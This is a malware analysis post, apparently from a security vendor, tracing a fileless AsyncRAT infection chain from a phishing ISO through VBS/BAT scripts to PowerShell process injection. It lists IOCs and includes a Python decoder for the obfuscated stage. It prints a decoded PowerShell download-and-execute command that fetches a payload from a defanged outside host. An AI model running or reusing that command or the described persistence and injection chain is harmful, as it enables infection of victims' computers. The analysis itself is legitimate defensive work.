AsyncRAT Being Distributed in Fileless Form

The ASEC analysis team has recently discovered that AsyncRAT is being distributed in fileless form. The distributed AsyncRAT is executed filelessly through a chain of script files and is thought to arrive as a compressed file attached to emails. AsyncRAT is an open-source RAT developed in .NET that can carry out a variety of malicious actions on the attacker's command.

The compressed file distributed through phishing emails contains an HTML file; opening it saves the malicious data embedded in the HTML as an ISO file. ISO is an extension that various malware families have commonly been using recently.

Inside the compressed file

HTML file that generates a malicious ISO file

The generated ISO file uses file names related to receipts and invoices, and it contains a VBScript file and a BAT file.

  • File Name
    Receipt.iso
    Paid_invoice.iso
Inside ISO file (1)

Inside ISO file (2)

The VBScript executes the BAT file placed alongside it, and the BAT file executes an obfuscated command.

VBS Code

BAT Code

The decoded command below executes a malicious PowerShell command through cmd. That PowerShell command in turn executes another PowerShell command located at a certain path.

  • Decoded command
    CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$XCZM='IEX(NEW-OBJECT NET.W';$SYWD='EBCLIENT).DOWNLO';[BYTE[]];$VFDR='TUUL("hxxps://aga12[.]ir/ico.png")'.REPLACE('TUUL','ADSTRING');[BYTE[]];IEX($XCZM+$SYWD+$VFDR)
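To show how the string-splitting and .REPLACE() obfuscation in the decoded command resolves to the download stage, here is an added Python helper (not from the original post or the ASEC team) that statically evaluates this pattern without executing anything; the sample command is reconstructed from the one quoted above, with straight quotes.

```python
import re

# Constructed sample: the decoded cmd/PowerShell stage quoted in the post,
# re-typed with straight quotes (the blog renders them as curly quotes).
SAMPLE = (
    "CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI "
    "[BYTE[]];$XCZM='IEX(NEW-OBJECT NET.W';$SYWD='EBCLIENT).DOWNLO';"
    "[BYTE[]];$VFDR='TUUL(\"hxxps://aga12[.]ir/ico.png\")'.REPLACE('TUUL','ADSTRING');"
    "[BYTE[]];IEX($XCZM+$SYWD+$VFDR)"
)

# $name='literal' optionally followed by one or more .REPLACE('old','new') calls
ASSIGN_RE = re.compile(
    r"\$(?P<name>\w+)=(?P<literal>'[^']*')"
    r"(?P<replaces>(?:\.REPLACE\('[^']*','[^']*'\))*)",
    re.IGNORECASE,
)
REPLACE_RE = re.compile(r"\.REPLACE\('([^']*)','([^']*)'\)", re.IGNORECASE)
# Only IEX calls whose argument is a sum of variables, so the IEX( text
# inside a string literal is not mistaken for the real invocation.
IEX_RE = re.compile(r"IEX\((?P<expr>\$\w+(?:\+\$\w+)*)\)", re.IGNORECASE)
URL_RE = re.compile(r"h(?:xx|tt)ps?://[^\s\"')]+", re.IGNORECASE)


def resolve_variables(command: str) -> dict:
    """Collect every $name='literal'.REPLACE(...) assignment, applying each
    REPLACE the way String.Replace does (all occurrences, case-sensitive).
    PowerShell variable names are case-insensitive, so keys are upper-cased."""
    variables = {}
    for m in ASSIGN_RE.finditer(command):
        value = m.group("literal")[1:-1]
        for old, new in REPLACE_RE.findall(m.group("replaces")):
            value = value.replace(old, new)
        variables[m.group("name").upper()] = value
    return variables


def decode_iex(command: str) -> list:
    """Return the string each IEX($a+$b+...) would hand to the interpreter."""
    variables = resolve_variables(command)
    decoded = []
    for m in IEX_RE.finditer(command):
        names = re.findall(r"\$(\w+)", m.group("expr"))
        decoded.append("".join(variables.get(n.upper(), "") for n in names))
    return decoded


def extract_urls(text: str) -> list:
    """Pull download locations (defanged or not) out of a decoded stage."""
    return URL_RE.findall(text)


if __name__ == "__main__":
    for stage in decode_iex(SAMPLE):
        print(stage, extract_urls(stage))
```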

A portion of the additional PowerShell command is shown below. It generates a total of 5 script files and then executes them. The list and figures below describe the features of the 5 generated scripts.

Additional PowerShell command (1)

Additional PowerShell command (2)

1. C:\ProgramData\Express\xx.vbs

xx.vbs code

This is the first script executed after the 5 scripts are generated. It executes the file C:\ProgramData\Express\xx.bat generated alongside it.

2. C:\ProgramData\Express\xx.bat

xx.bat code

This script registers the file C:\ProgramData\Express\Cotrl.vbs in the Task Scheduler. The registered task is set to run every 3 minutes.

3. C:\ProgramData\Express\Cotrl.vbs

Cotrl.vbs

This script executes the file C:\ProgramData\Express\Cotrl.vbs.

4. C:\ProgramData\Express\Cotrl.bat

Cotrl.bat code

This script forcibly terminates the PowerShell process and then executes the file C:\ProgramData\Express\Cotrl.ps1.

5. C:\ProgramData\Express\Cotrl.ps1

Cotrl.ps1 code (1)

Cotrl.ps1 code (2)

This script, the last to be executed, is the one that performs the actual malicious behavior. It contains 2 pieces of malicious data: the Loader and AsyncRAT. The first piece, which serves as the Loader, is loaded and the Execute method of its GIT.local is invoked, with the path "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" and the second piece of data (AsyncRAT) passed as arguments.

The Execute method of GIT.local is shown below. Using the path and the malicious data passed as arguments, it injects the payload into a legitimate process (C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe).

Loader

Injection

The injected data is AsyncRAT, an open-source RAT published on GitHub. It receives commands from the attacker through the C2 server and can perform a variety of malicious behaviors; most of them are carried out through plugins delivered by the attacker. Its default features include anti-VM checks, keylogging, and a remote shell.

  • C2
    vrln200.duckdns[.]org:6666
C2 Decryption

Anti VM

Distribution of malware through ISO files has increased recently. Moreover, the malware is executed filelessly, which makes it difficult for users to identify what kind of malware was run. Users should refrain from opening files from unknown sources and should run regular scans on their PCs.

[File Detection]
Dropper/HTML.Generic (2022.08.11.03)
Trojan/PowerShell.Loader (2022.08.18.00)
Dropper/ISO.Agent (2022.08.18.00)
Trojan/BAT.Runner (2022.08.18.00)
Downloader/BAT.Generic (2022.08.18.00)
Trojan/VBS.Runner (2022.08.18.00)

[IOC]
hxxps://aga12[.]ir/ico.png
vrln200.duckdns[.]org:6666

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories: Malware Information
